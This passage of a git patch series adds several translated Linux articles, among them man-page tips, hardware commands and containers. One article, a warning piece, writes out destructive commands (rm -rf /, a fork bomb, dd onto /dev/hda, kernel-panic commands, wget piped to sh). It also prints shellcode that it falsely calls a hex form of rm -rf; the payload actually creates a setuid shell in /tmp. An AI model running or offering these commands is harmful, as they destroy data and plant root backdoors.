/var/log/httpd/yourdomain.com-error_log + CustomLog /var/log/httpd/yourdomain.com-access_log common + +``` + +save the file and enable the virtual host +``` +a2ensite yourdomain.com + +Enabling site yourdomain.com. +To activate the new configuration, you need to run: + service apache2 reload +``` + +Finally, reload the web server as suggested, for the changes to take effect +``` +service apache2 reload +``` + +### 9. Follow the on-screen instructions and complete the installation + +Now, go to `http://yourdomain.com` and follow the on-screen instructions to complete the Moodle installation. For more information on how to configure and use Moodle, you can check their [official documentation][4]. + +You don't have to install Moodle on Ubuntu 16.04, if you use one of our [optimized Moodle hosting][5], in which case you can simply ask our expert Linux admins to install and configure the latest version of Moodle on Ubuntu 16.04 for you. They are available 24×7 and will take care of your request immediately. + +**PS.** If you liked this post on how to install Moodle on Ubuntu 16.04, please share it with your friends on the social networks using the buttons on the left or simply leave a reply below. Thanks. + +-------------------------------------------------------------------------------- + +via: https://www.rosehosting.com/blog/how-to-install-moodle-on-ubuntu-16-04/ + +作者:[RoseHosting][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.rosehosting.com +[1]:https://www.rosehosting.com/blog/wp-content/uploads/2017/12/How-to-Install-Moodle-on-Ubuntu-16.04.jpg +[2]:https://moodle.com/hq +[3]:https://www.rosehosting.com/cdn-cgi/l/email-protection +[4]:https://docs.moodle.org/34/en/Main_page +[5]:https://www.rosehosting.com/moodle-hosting.html From 68fa27eec5126d167a3030f36224f21c4a65c152 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 19 Dec 2017 14:39:59 +0800 Subject: [PATCH 0705/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Learn=20To=20Us?= =?UTF-8?q?e=20Man=20Pages=20Efficiently?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...1215 Learn To Use Man Pages Efficiently.md | 169 ++++++++++++++++++ 1 file changed, 169 insertions(+) create mode 100644 sources/tech/20171215 Learn To Use Man Pages Efficiently.md diff --git a/sources/tech/20171215 Learn To Use Man Pages Efficiently.md b/sources/tech/20171215 Learn To Use Man Pages Efficiently.md new file mode 100644 index 0000000000..db0d90e75a --- /dev/null +++ b/sources/tech/20171215 Learn To Use Man Pages Efficiently.md @@ -0,0 +1,169 @@ +translating by lujun9972 +Learn To Use Man Pages Efficiently +====== +A while ago, we have published a brief guide that described how to easily [**recall forgotten Linux commands**][1]. That guide was really quite useful for those having trouble at remembering commands. Today, we are going to learn how to get want you want from man pages effectively and quickly. As you might already know, a typical man page is divided into several parts, each with a distinct heading. You might need to scroll down for quite a long time when you're looking for a particular information on the specific flag/option. This is really inefficient and time consuming process. This is why it is important to learn to use man pages efficiently to find out what exactly you want to know. + +In this brief tutorial, I will be sharing few important tricks which I use daily when referring man pages. + +### Learn To Use Man Pages Efficiently + +#### Basic use + +As we all know, we can open a man page of a command, for example "mkdir", using command: +``` +man mkdir +``` + +Use **spacebar** , **d** , **b** and **up** / **down** arrows to browse through the man page. To go to the end of the man page, press **End** key and to go to the fist page of a man page, press **Home** key. Press **h** key in the currently opened man page to know all useful keyboard shortcuts and general usage information. + +[![][2]][3] + +Press **q** to exit the man page. + +#### Recall a forgotten command + +For those who don't know which command they actually want can refer the link that I attached in the first paragraph of this guide. We also can do it using man pages too. Let us say, you want to create a directory, but you couldn't remember what command we use to create a directory. + +To do so, use grep command with man: +``` +man -k directory | grep create +``` + +Sample output would be: +``` +CURLOPT_NEW_DIRECTORY_PERMS (3) - permissions for remotely created directories +libssh2_sftp_mkdir_ex (3) - create a directory on the remote file system +mkdir (2) - create a directory +mkdirat (2) - create a directory +mkdtemp (3) - create a unique temporary directory +mkdtemp (3p) - create a unique directory or file +mkfontdir (1) - create an index of X font files in a directory +mklost+found (8) - create a lost+found directory on a mounted Linux second extended file... +mkstemp (3p) - create a unique directory +mktemp (1) - create a temporary file or directory +pam_mkhomedir (8) - PAM module to create users home directory +``` + +[![][2]][4] + +Just read the description of the each command and pick the suitable command. Ahh, you now remember. **mkdir** is the one that you 're looking for, isn't it? It's that simple. + +#### Search within man pages + +Once you're in a man page, you may want to look for specific string. To do so, just type **/** (forward slash) followed by your search string like below +``` +/ or +``` + +Let us say, you're in man page of mount command and wants to look for information on the **- bind** option. To do so, type: +``` +/bind +``` + +[![][2]][5] + +Any matches to the search string in the current man page will be highlighted. + +[![][2]][6] + +Press **" n"** and **" SHIFT+n"** to browse through the next and previous matches. + +/pattern(or string) - will search forward for (N-th) matching line. You can also do the backward searching using **?pattern**. This can be helpful if you are at the end or middle of the man page. +``` +?bind +``` + +To display only matching lines, type: +``` +&bind +``` + +[![][2]][7] + +In this search method, you don't have to use "n" or "shift+n" to scroll through next and previous matches. **& pattern** will only display the matching lines that contains the search term, everything else will be omitted. + +#### Search matches without opening man page + +It is also possible to search for information on the specific option without opening man page. + +For instance, you're looking for information on the **-m** option of **mkdir** command. To find it out, run: +``` +man mkdir | grep -e '-m' +``` + +Or, +``` +man mkdir | grep -- '-m' +``` + +[![][2]][8] + +This command will display the **first occurrence** of **-m** in the man page of mkdir command. As we see in the above command -m represents MODE (chmod). + +If you want to see the complete man page of mkdir command but skip directly to the first occurrence of **-m** , use the following command: +``` +man mkdir | less +/-m +``` + +[![][2]][9] + +Here is another example: +``` +man mount | less +/--bind +``` + +[![][2]][10] + +Press "n" and "SHIFT+n" to browse through the next and previous matches. + +Also read:[3 Good Alternatives To Man Pages Every Linux User Should Know][11] + +#### Export entire man page to text file + +We can export the entire man page of a specific command to a text file. To do so, just run the following command: +``` +man mount > mount.txt +``` + +This command will export the man page of the mount command to mount.txt file and save it in the current working directory. + +It is also possible to obtain a simpler version of a man page, without backspaces and underscores, using the following command. +``` +man mount | col -b > mount.txt +``` + +To know more details about man pages, run: +``` +man man +``` + +This command will display the man page about the man pages. These tricks are just basics but enough to get going. These tricks will save you a lot of time and avoid unlimited scrolling. + +And, that's all for today. Hope you find this useful. More good stuffs to come. Stay tuned! + +Cheers! + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/learn-use-man-pages-efficiently/ + +作者:[][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com +[1]:https://www.ostechnix.com/easily-recall-forgotten-linux-commands/ +[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 +[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-4.png () +[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-3.png () +[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-5.png () +[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-6.png () +[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-8.png () +[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-1.png () +[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-2-1.png () +[10]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-7.png () +[11]:https://www.ostechnix.com/3-good-alternatives-man-pages-every-linux-user-know/ From 26fe17943371a8f628553cefe2a9709d0898214e Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 19 Dec 2017 14:54:36 +0800 Subject: [PATCH 0706/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Commands=20to?= =?UTF-8?q?=20check=20System=20&=20Hardware=20Information?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... to check System & Hardware Information.md | 96 +++++++++++++++++++ 1 file changed, 96 insertions(+) create mode 100644 sources/tech/20170515 Commands to check System & Hardware Information.md diff --git a/sources/tech/20170515 Commands to check System & Hardware Information.md b/sources/tech/20170515 Commands to check System & Hardware Information.md new file mode 100644 index 0000000000..c113b61cc4 --- /dev/null +++ b/sources/tech/20170515 Commands to check System & Hardware Information.md @@ -0,0 +1,96 @@ +Commands to check System & Hardware Information +====== +Hello linux-fanatics, in this post i will be discussing some important that will make your life as System Administrator. As we all know being a good System Administrator means knowing everything about your IT Infrastructure & having all the information about your servers, whether its hardware or OS. So following commands will help you out in extracting out all the hardware & system information. + +#### 1- Viewing system information + +$ uname -a + +![uname command][2] + +It will provide you all the information about your system. It will provide you with Kernel name of system, Hostname, Kernel version, Kernel Release, Hardware name. + +#### 2- Viewing Hardware information + +$ lshw + +![lshw command][4] + +Using lshw will show you all the Hardware information on your screen. + +#### 3- Viewing Block Devices(Hard disks, Flash drives) information + +$ lsblk + +![lsblk command][6] + +lsblk command prints all the information regarding block devices on screen. Use lsblk -a to show all the block devices. + +#### 4- Viewing CPU information + +$ lscpu + +![lscpu command][8] + +lscpu shows all the CPU information on screen. + +#### 5- Viewing PCI information + +$ lspci + +![lspci command][10] + +All the network adapter cards, USB cards, Graphics cards are termed as PCIs. To view their information use lspci . + +lspci -v will give detailed information regarding PCI cards. + +lspci -t will show them in tree format. + +#### 6- Viewing USB information + +$ lsusb + +![lsusb command][12] + +To view information regarding all USB controllers & devices connected to them, we use lsusb + +#### 7- Viewing SCSI information + +$ lssci + +![lssci][14] + +To view SCSI information type lsscsi. lsscsi -s will also show the size of partition. + +#### 8- Viewing file system information + +$ fdisk -l + +![fdisk command][16] + +Using fdisk -l will show information regarding the file system. Although main function of fdisk utility is to modify a file system, you can create new partitions, delete old ones ( more on that in my future tutorial). + +That's it for now my fellow Linux-fanatics . You are advised to check out my other posts regarding Linux commands **[HERE][17] & ** another one **[HERE][18] +** + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/commands-system-hardware-info/ + +作者:[Shusain][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/uname.jpg?resize=664%2C69 +[4]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lshw.jpg?resize=641%2C386 +[6]:https://i1.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsblk.jpg?resize=646%2C162 +[8]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lscpu.jpg?resize=643%2C216 +[10]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lspci.jpg?resize=644%2C238 +[12]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsusb.jpg?resize=645%2C37 +[14]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/lsscsi.jpg?resize=639%2C110 +[16]:https://i2.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fdisk.jpg?resize=656%2C335 +[17]:http://linuxtechlab.com/linux-commands-beginners-part-1/ +[18]:http://linuxtechlab.com/linux-commands-beginners-part-2/ From 734f38d72efc3929cb9bcae16ad33217452a9571 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 19 Dec 2017 15:07:07 +0800 Subject: [PATCH 0707/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=20step-by-ste?= =?UTF-8?q?p=20guide=20to=20building=20open=20culture?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...-by-step guide to building open culture.md | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 sources/tech/20171214 A step-by-step guide to building open culture.md diff --git a/sources/tech/20171214 A step-by-step guide to building open culture.md b/sources/tech/20171214 A step-by-step guide to building open culture.md new file mode 100644 index 0000000000..b5b0ef3998 --- /dev/null +++ b/sources/tech/20171214 A step-by-step guide to building open culture.md @@ -0,0 +1,46 @@ +translating by lujun9972 +A step-by-step guide to building open culture +====== +When we published The Open Organization in 2015, it ignited a spark of curiosity among companies of all shapes and sizes about what having an "open" culture really means. Even when I have the opportunity to talk to other companies about the benefits of working with our products and services, it doesn't take long for the topic of conversation to shift from technology to people and culture. It's on the mind of just about everyone interested in driving innovation and maintaining competitive advantage in their industries. + +Senior leadership teams aren't the only ones interested in working openly. The results of [a recent Red Hat survey][1] found that [81% of respondents][2] agreed with the statement: "Having an open organizational culture is currently important to my company." + +But there was a catch. Just [67% of respondents][3] to that same survey agreed with the statement: "My organization has the resources necessary to build an open culture." + +These results echo what I'm hearing in my conversations with other companies: People want to work in an open culture, but they just don't know what to do or how to get there. I sympathize, because how an organization does what it does is something that's always difficult to capture, assess, and understand. In [Catalyst-In-Chief][4], I call it "the most mysterious and elusive to organizations." + +The Open Organization makes the compelling case that embracing a culture of openness is the surest path to creating sustained innovation during a time when digital transformation promises to change many of the traditional ways we've approached work. When we wrote it, we focused on describing the kind of culture that thrives inside Red Hat on our best days--not on writing a how-to book. We didn't lay out a step-by-step process for other organizations to follow. + +That's why it's been interesting to talk to other leaders and executives about how they've gone about starting this journey on their own. When creating an open organization, many senior leaders tend to attack the issue by saying they want to "change their culture." But culture isn't an input. It's an output--a byproduct of how people interact and behave on a daily basis. + +When creating an open organization, many senior leaders tend to attack the issue by saying they want to "change their culture." But culture isn't an input. + +Telling members of an organization to "work more transparently," "collaborate more," or "act more inclusively" won't produce results you're looking for. That's because cultural characteristics like "transparency," "collaboration," and "inclusivity" aren't behaviors. They're the values that guide behaviors inside the organization. + +So how do you go about building an open culture? + +Over the past two years, the community at Opensource.com has collected best practices for working, managing, and leading in the spirit of openness. Now we're sharing them in a new book, [The Open Organization Workbook][5], a more prescriptive guide to igniting culture change. + +Just remember that change of any kind, especially at scale, requires commitment, patience, and plenty of hard work. I encourage you to use this workbook as a way to achieve small, meaningful wins first, as you build toward larger victories and changes over time. + +By picking up a copy of this book, you've embarked on an exciting journey toward building the kind of open and innovative cultures your people will thrive in. We can't wait to hear your story. + +This article is part of the [Open Organization Workbook project][6]. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/open-organization/17/12/whitehurst-workbook-introduction + +作者:[Jim Whitehurst][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jwhitehurst +[1]:https://www.redhat.com/en/blog/red-hat-releases-2017-open-source-culture-survey-results +[2]:https://www.techvalidate.com/tvid/923-06D-74C +[3]:https://www.techvalidate.com/tvid/D30-09E-B52 +[4]:https://opensource.com/open-organization/resources/catalyst-in-chief +[5]:https://opensource.com/open-organization/resources/workbook +[6]:https://opensource.com/open-organization/17/8/workbook-project-announcement From fb8f058e3d7b816efe2d03ad3cb404a59c486de2 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 19 Dec 2017 20:09:33 +0800 Subject: [PATCH 0708/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20Are=20Co?= =?UTF-8?q?ntainers=20and=20Why=20Should=20You=20Care=3F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Are Containers and Why Should You Care-.md | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 sources/tech/20171218 What Are Containers and Why Should You Care-.md diff --git a/sources/tech/20171218 What Are Containers and Why Should You Care-.md b/sources/tech/20171218 What Are Containers and Why Should You Care-.md new file mode 100644 index 0000000000..76c7bde415 --- /dev/null +++ b/sources/tech/20171218 What Are Containers and Why Should You Care-.md @@ -0,0 +1,59 @@ +What Are Containers and Why Should You Care? +====== +What are containers? Do you need them? Why? In this article, we aim to answer some of these basic questions. + +But, to answer these questions, we need more questions. When you start considering how containers might fit into your world, you need to ask: Where do you develop your application? Where do you test it and where is it deployed? + +You likely develop your application on your work laptop, which has all the libraries, packages, tools, and framework needed to run that application. It's tested on a platform that resembles the production machine and then it's deployed in production. The problem is that not all three environments are the same; they don't have same tools, frameworks, and libraries. And, the app that works on your dev machine may not work in the production environment. + +Containers solved that problem. As Docker explains, "a container image is a lightweight, standalone, executable package of a piece of software that includes everything needed to run it: code, runtime, system tools, system libraries, settings." + +What this means is that once an application is packaged as a container, the underlying environment doesn't really matter. It can run anywhere, even on a multi-cloud environment. That's one of the many reasons containers became so popular among developers, operations teams, and even CIOs. + +### Containers for developers + +Now developers or operators don't have to concern themselves with what platforms they are using to run applications. Devs don't have to tell ops that "it worked on my system" anymore. + +Another big advantage of containers is isolation and security. Because containers isolate the app from the platform, the app remains safe and keeps everything around it safe. At the same time, different teams can run different applications on the same infrastructure at the same time -- something that's not possible with traditional apps. + +Isn't that what virtual machines (VM) offer? Yes and no. VMs do offer isolation, but they have massive overhead. [In a white paper][1], Canonical compared containers with VM and wrote, "Containers offer a new form of virtualization, providing almost equivalent levels of resource isolation as a traditional hypervisor. However, containers are lower overhead both in terms of lower memory footprint and higher efficiency. This means higher density can be achieved -- simply put, you can get more for the same hardware." Additionally, VMs take longer to provision and start; containers can be spinned up in seconds, and they boot instantly. + +### Containers for ecosystem + +A massive ecosystem of vendors and solutions now enable companies to deploy containers at scale, whether it's orchestration, monitoring, logging, or lifecycle management. + +To ensure that containers run everywhere, the container ecosystem came together to form the [Open Container Initiative][2] (OCI), a Linux Foundation project to create specifications around two core components of containers -- container runtime and container image format. These two specs ensure that there won't be any fragmentation in the container space. + +For a long time, containers were specific to the Linux kernel, but Microsoft has been working closely with Docker to bring support for containers on Microsoft's platform. Today you can run containers on Linux, Windows, Azure, AWS, Google Compute Engine, Rackspace, and mainframes. Even VMware is adopting containers with [vSphere Integrated Container][3] (VIC), which lets IT pros run containers and traditional workloads on their platforms. + +### Containers for CIOs + +Containers are very popular among developers for all the reasons mentioned above, and they offer great advantages for CIOs, too. The biggest advantage of moving to containerized workloads is changing the way companies operate. + +Traditional applications have a life-cycle of a about a decade. New versions are released after years of work and because they are platform dependent, sometimes they don't see production for years. Due to this lifecycle, developers try to cram in as many features as they can, which can make the application monolithic, big, and buggy. + +This process affects the innovative culture within companies. When people don't see their ideas translated into products for months and years, they are demotivated. + +Containers solve that problem, because you can break the app into smaller microservices. You can develop, test, and deploy in a matter of weeks or days. New features can be added as new containers. They can go into production as soon as they are out of testing. Companies can move faster and stay ahead of the competitors. This approach breeds innovation as ideas can be translated into containers and deployed quickly. + +### Conclusion + +Containers solve many problems that traditional workloads face. However, they are not the answer to every problem facing IT professionals. They are one of many solutions. In the next article, we'll cover some of the basic terminology of containers, and then we will explain how to get started with containers. + +Learn more about Linux through the free ["Introduction to Linux" ][4] course from The Linux Foundation and edX. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/intro-to-Linux/2017/12/what-are-containers-and-why-should-you-care + +作者:[wapnil Bhartiya][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/arnieswap +[1]:https://www.ubuntu.com/containers +[2]:https://www.opencontainers.org/ +[3]:https://www.vmware.com/products/vsphere/integrated-containers.html +[4]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux From 2cd10b8f1e28e44d5417b1605760206326611408 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 19 Dec 2017 20:11:27 +0800 Subject: [PATCH 0709/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20The=20Linux=20c?= =?UTF-8?q?ommands=20you=20should=20NEVER=20use?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...The Linux commands you should NEVER use.md | 183 ++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 sources/tech/20171219 The Linux commands you should NEVER use.md diff --git a/sources/tech/20171219 The Linux commands you should NEVER use.md b/sources/tech/20171219 The Linux commands you should NEVER use.md new file mode 100644 index 0000000000..679d386b95 --- /dev/null +++ b/sources/tech/20171219 The Linux commands you should NEVER use.md @@ -0,0 +1,183 @@ +The Linux commands you should NEVER use +====== +Unless, of course, you like killing your machines. + +Spider-Man's credo is, "With great power comes great responsibility." That's also a wise attitude for Linux system administrators to adopt. + +No! Really! Thanks to DevOps and cloud orchestration, a Linux admin can control not merely a single server, but tens of thousands of server instances. With one stupid move--like [not patching Apache Struts][1]--you can wreck a multibillion-dollar enterprise. + +Failing to stay on top of security patches is a strategic business problem that goes way above the pay grade of a system administrator. But there are many simple ways to blow up Linux servers, which do lie in the hands of sysadmins. It would be nice to imagine that only newbies make these mistakes--but we know better. + +Here are infamous commands that enable anyone with root access to wreak havoc. + +A word of caution: Never, ever run any of these on a production system. They will harm your system. Don't try this at home! Don't try it at the office, either. + +That said, onward! + +### rm -rf / + +Want to ruin a Linux system in no time flat? You can't beat this classic "worst command ever." It deletes everything--and I mean everything--from your system. + +Like most of these [Linux commands][2], the core program, `rm`, is very handy. It enables you to delete even the most stubborn files. But you're in deep trouble when you combine `rm` with those two flags: `-r`, which forces recursive deletion through all subdirectories, and `-f`, which forces deletion of read-only files without confirmation. If you run it from the / root directory, you'll wipe every last bit of data on your entire drive. + +Just imagine trying to explain that to the boss! + +Now, you might think, "I could never make such a dumb mistake." Oh, my friend, pride goes before a fall. Consider [this cautionary tale from a sysadmin on Reddit][3]: + +> I've been in IT a long time, but today, in Linux, as root, I `rm -r` the wrong path. +> +> Long story short, I had to copy a bunch of dirs from one path to another and, as you do, I did a couple of `cp -R` to copy the needed about. +> +> In my wisdom, I tapped the up arrow a couple of times as the dirs to copy are similarly named but they're in amongst a whole bunch of other stuff. +> +> Anyway, I tapped too far and being distracted as I typed on Skype and Slack and WhatsApp web as well as taking a call from Sage, my brained auto-piloted in: `rm -R ./videodir/* ../companyvideodirwith651vidsin/` + +And there went corporate video file after file into the void. Fortunately, after much frantic pounding of `control-C`, the sysadmin managed to stop the command before it deleted too many files. But let this be a warning to you: Anyone can make this mistake. + +True, most modern systems warn you in great big letters before you make this blunder. However, if you are busy or distracted as you pound away on the keyboard, you can type your system into a black hole. + +There are sneakier ways to get rm -rf. Consider the code below: + +`char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"` + +`"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"` + +`"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"` + +`"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"` + +`"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"` + +`"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"` + +`"\x6e\x2f\x73\x68\x00\x2d\x63\x00"` + +`"cp -p /bin/sh /tmp/.beyond; chmod 4755` + +`/tmp/.beyond;";` + +What is it? It's the hex version of `rm -rf`. Don't run any command unless you know what it is. + +### Bash fork bomb + +Since we are on the topic of odd-looking code, consider this line: +``` +:(){ :|: & };: +``` + +It may look cryptic to you, but to me, it looks like the infamous [Bash fork bomb][4]. All it does is start new Bash shells, over and over again, until all your system resources are consumed and the system crashes. + +An up-to-date Linux system shouldn't do this. Note, I said shouldn't. I didn't say won't. Properly set up, Linux systems block this behavior from causing too much harm by setting user limits. Usually, users are restricted to allocate only the memory that the machine has available. But if you run the above (or some other [Bash fork bomb variants][5]) as root, you can still knock a server off until it's rebooted. + +### Overwriting the hard drive with garbage + +There are times you want to zap the data from a disk, but for that job, you should use a tool such as [Darik's Boot and Nuke (DBAN)][6]. + +But for just making a royal mess of your storage, it's hard to beat running: +``` +Any command > /dev/hda +``` + +When I say "any command," I mean any command with output. For example: +``` +ls -la > /dev/hda +``` + +…pipes the directory listing to your main storage device. Given time, and root privileges, this overwrites all the data on your drive. That's always a good way to start the day in a blind panic--or turn it into a [career-limiting crisis][7]. + +### Wipe that drive! + +Another all-time favorite way to smoke storage is to run: +``` +dd if=/dev/zero of=/dev/hda +``` + +With this command, you're writing data to a drive. The `dd` command pulls its data from the special file, which outputs an infinity of zeros, and pours those zeros all over the hard drive. + +Now /dev/zero may sound like a really silly idea, but it has real uses. For example, you can use it to [clear unused space in a partition with zeros][8]. This makes compressing an image of the partition much smaller for data transfer or archival uses. + +On the other hand, its close relative, `dd if=/dev/random of=/dev/hda`, isn't good for much except ruining your day. If you ran this command (please don't), you would cover your storage with random crap. As a half-assed way to hide your secret plans to take over the office coffee machine, it's not bad, but DBAN is a better tool for that job. + +### /dev/null for the loss + +Perhaps it's because our data is precious to us and our confidence in backups is minimal, but many of these "Never do this!" Linux commands have the result of wiping a hard disk or other storage repository. Case in point: Another pair of ways to ruin your storage is to run `mv / /dev/null` or `>mv ` /dev/null`. + +In the former case, you as the root user are sending all the drive's data into the ever-hungry maw of `/dev/null`. In the latter, you're just feeding your home directory into the same vault of emptiness. In either case, short of restoring from a backup, you won't be seeing any of that data ever again. + +When it comes to containers, don't forget data persistence or data storage. 451 Research offers advice. + +[Get the report][9] + +Heck, accounting didn't really need up-to-date receivables files anyway, did they? + +### Formatting the wrong drive + +Sometimes you must format a drive with a command like: +``` +mkfs.ext3 /dev/hda +``` + +…which formats the primary hard drive with the ext3 file system. But, wait one darn second! What are you doing formatting your main drive! Aren't you using it? + +Make doubly sure when you're formatting drives--be they solid state, flash, or good old ferrous oxide--that you're formatting the partition that really needs it and not one that's already in use. + +### Kernel panics + +Some Linux commands do not put your machine down for the long count. However, a variety of them can cause the kernel to panic. Normally, these failures are caused by hardware issues, but you can do it to yourself. + +When you encounter a kernel panic, you need to reboot the system to get back to work. In some cases, that's a mild annoyance; in others--such as a production system under heavy load--it's a big deal. Examples include: +``` +dd if=/dev/random of=/dev/port + + echo 1 > /proc/sys/kernel/panic + + cat /dev/port + + cat /dev/zero > /dev/mem +``` + +All of these cause kernel panics. + +Never run a command unless you know what it's supposed to do, which reminds me… + +### Be wary of unknown scripts + +Young or lazy sysadmins like to borrow scripts written by other people. Why reinvent the wheel, right? So, they find a cool script that promises to automate and check all backups. They grab it with a command such as: +``` +wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh +``` + +This downloads the script and then shoots it over to the shell to run. No fuss, no muss, right? Wrong. That script may be poisoned with malware. Sure, Linux is safer than most operating systems by default, but if you run unknown code as root, anything can happen. The danger is not only in maliciousness; the script author's stupidity is equally as harmful. You can be bitten by someone else's undebugged code--because you didn't take the time to even read it through. + +You'd never do something like that? Tell me, all those [container images you're running on Docker][10]? Do you know what they're really running? I know too many sysadmins who run containers without verifying what's really in them. Don't be like them. + +### Shutdown + +The moral of these stories is simple. With Linux, you get an enormous amount of control over your system. You can make your servers do almost anything. But you must make certain that you use that power conscientiously. If you don't, you can wreck not just your servers, but your job and your company. Be like Spider-Man, and use your power responsibly. + +Did I miss any? Tweet me at [@sjvn][11] and [@enterprisenxt][12] to tell me which Linux commands are on your "[Never use this!][13]" list. + +-------------------------------------------------------------------------------- + +via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html + +作者:[Steven Vaughan-Nichols][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.hpe.com/us/en/insights/contributors/steven-j-vaughan-nichols.html +[1]:http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/ +[2]:https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html +[3]:https://www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/ +[4]:https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/ +[5]:https://unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of +[6]:https://dban.org/ +[7]:https://www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html +[8]:https://unix.stackexchange.com/questions/44234/clear-unused-space-with-zeros-ext3-ext4 +[9]:https://www.hpe.com/us/en/resources/solutions/enterprise-devops-containers.html?jumpid=in_insights~510287587~451_containers~badLinux +[10]:https://www.oreilly.com/ideas/five-security-concerns-when-using-docker +[11]:http://www.twitter.com/sjvn +[12]:http://www.twitter.com/enterprisenxt +[13]:https://www.youtube.com/watch?v=v79fYnuVzdI From 839e207fec31d72a8ef8725d0fe2e4de509bf497 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 19 Dec 2017 20:54:53 +0800 Subject: [PATCH 0710/1627] =?UTF-8?q?=E6=9B=B4=E6=96=B0=20CI=20=E6=A3=80?= =?UTF-8?q?=E6=9F=A5=E8=A7=84=E5=88=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Makefile | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Makefile b/Makefile index 002f5d83ba..e64b873be9 100644 --- a/Makefile +++ b/Makefile @@ -18,28 +18,28 @@ $(CHANGE_FILE): git --no-pager diff $(TRAVIS_BRANCH) FETCH_HEAD --no-renames --name-status > $@ rule-source-added: - [ $(shell grep '^A\s\+sources/[a-zA-Z0-9_-/ ]*\.md' $(CHANGE_FILE) | wc -l) -ge 1 ] - [ $(shell grep -v '^A\s\+sources/[a-zA-Z0-9_-/ ]*\.md' 